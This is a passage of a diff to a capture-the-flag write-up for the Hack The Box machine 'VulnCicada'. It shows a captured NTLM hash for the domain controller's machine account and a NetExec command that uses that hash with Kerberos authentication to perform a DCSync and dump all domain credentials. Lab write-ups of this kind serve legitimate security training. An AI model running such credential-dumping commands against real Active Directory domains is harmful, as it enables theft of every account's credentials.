meringue7/Writeups/HTB/VulnCicada/VulnCicada.md

 [*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
 ```

-With the DC machine account, I can perform a DCSync attack over the domain.
-I use NetExec for that with a Kerberos authentication.
+Now that I have the DC's hash, I can perform a DCSync attack to dump all domain credentials.
+I'll use `NetExec` with Kerberos authentication to execute it.

 ```bash
 # nxc smb DC-JPQ225.cicada.vl -u 'DC-JPQ225' -H 'a65952c664e9cf5de60195626edbeee3' -k --ntds